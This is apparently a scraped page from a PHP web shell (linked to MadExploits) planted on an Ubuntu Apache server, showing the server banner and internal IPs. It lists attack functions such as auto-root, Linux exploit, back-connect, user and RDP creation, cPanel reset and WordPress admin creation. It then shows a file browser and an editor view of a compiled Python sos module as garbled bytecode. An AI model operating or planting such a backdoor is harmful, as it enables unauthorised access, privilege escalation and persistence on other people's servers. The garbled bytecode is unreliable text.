Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib /
python3 /
dist-packages /
sos /
__pycache__ /
[ HOME SHELL ]
Name
Size
Permission
Action
__init__.cpython-310.pyc
5.15
KB
-rw-r--r--
archive.cpython-310.pyc
21.2
KB
-rw-r--r--
component.cpython-310.pyc
12.51
KB
-rw-r--r--
missing.cpython-310.pyc
2.71
KB
-rw-r--r--
options.cpython-310.pyc
11.73
KB
-rw-r--r--
utilities.cpython-310.pyc
16.69
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : component.cpython-310.pyc
o ���b�@ � @ s� d dl Z d dlZd dlZd dlZd dlZd dlZd dlmZ d dlmZ d dl m Z d dl mZ d dlm Z d dlmZ d dlmZ d d lmZ d d lmZmZ G dd� d�ZG d d� d�ZdS )� N)�SUPPRESS)�datetime)�getpass)�rmtree)�Path)�__version__)�TarFileArchive)� SoSOptions)�TempFileUtil� shell_outc @ s� e Zd ZdZdZi ZdZdZdZdZ dddddddddd dd d�Z dd � Zdd� Zdd� Z dd� Zd,dd�Zdd� Zdd� Zedd� �Zdd� Zdd� Zd d!� Zd"d#� Zd$d%� Zd-d&d'�Zd(d)� Zd*d+� ZdS ).�SoSComponenta� Any sub-command that sos supports needs to subclass SoSComponent in order to be properly supported by the sos binary. This class contains the standardized entrypoint for subcommands, as well as building out supported options from both globally shared option lists, and options supported by that specific subcommand. When sos initializes, it will load an unintialized instance of each class found within one recursion of the module root directory that subclasses SoSComponent. If sos is able to match the user-specified subcommand to one that exists locally, then that SoSComponent is initialized, logging is setup, and a policy is loaded. From there, the component's execute() method takes over. Added in 4.0 �unsetTF�autoz/etc/sos/sos.confN� � r )�batch�compression_type�config_file�debug�encrypt�encrypt_key�encrypt_pass�quiet�threads�tmp_dir�sysroot� verbosityc C s� || _ || _|| _d| _d | _d | _d | _d | _zdd l}|�|j | � � � W n ty0 Y nw | j� | j� | �� | _| jr~| �� }t� | _tj�|�rUt�|tj�shd| }|d7 }tj�|� | �d� || _tjd| jd�| _t | j�| _| �!� | j"r�| �#� | jd ur�| j�$dt%� | j�$d d �&| j�� | j�$dt'�(� � | j�$dd � | j�$dd � | j�$dd � | j�$d| j� | j�$d| j)� | j�$d| j*j+� | j�,d� d S d S )NFr ztemporary directory %s z"does not exist or is not writable � zsos.)�prefix�dir�version�cmdline� � start_time�end_timer �run_time�compression�tmpdir�tmpdir_fs_type�policy� components)-�parser�argsr! �exit_process�archiver'